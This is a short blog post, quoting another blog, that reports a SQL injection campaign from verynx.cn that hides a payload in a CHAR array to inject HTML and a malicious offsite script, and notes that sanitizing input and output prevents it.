It seems like SQL injection is coming back into style. This attack injects some html and a reference to an offsite javascript file. The sad part here is that this stuff still works. If an application is written properly, both input and output is sanitized, so that even if the code gets into the database, it will never be displayed in a form the browser will execute.
From rtraction:
A new SQL injection hack seems to be out in the wild from verynx.cn. The SQL Injection hack uses a CHAR array to hide its payload which will insert some various html garbage along with a reference to a javascript file on the verynx.cn domain that will infect users when they visit your website. Luckily the domain with the offending javascript file now points to 127.0.0.1 which will help stop the spread of the virus. Unfortunately the botnet still seems to be spamming websites with the scripted attack leaving many entirely broken or loading extremely slow as each page might have hundreds of requests to the payload. [From rtraction » Blog Archive » SQL Injection Hack using CAST from 1.verynx.cn]
Leave a comment